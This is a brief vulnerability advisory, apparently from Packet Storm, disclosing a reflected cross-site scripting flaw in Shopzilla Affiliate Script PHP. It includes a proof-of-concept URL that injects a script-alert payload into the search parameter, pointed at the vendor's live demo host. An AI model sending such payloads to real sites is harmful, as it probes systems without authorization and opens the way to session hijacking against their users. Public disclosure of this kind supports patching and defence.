Shopzilla Affiliate Script suffers from a cross site scripting vulnerability.
a1f369fe3b3e62eb5864551bd2a925f0e4cc0a0333efba4d603d40ca910cedd7
# [x] Author: Andrea Bocchetti
# [x] Homepage : http://www.geekit.it
// Software Info
# [x] Name : Shopzilla Affiliate Script PHP
# [x] Vendor : http://www.v-eva.com/
# [x] Price : 70.95 USD
# [x] Exploit :
#
# http://localhost/search.php?s=(XSS)
#
http://www.shopping.v-eva.com/search.php?s=%3Cscript%3Ealert(/XSS/)%3C/script%3E
#EOF
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed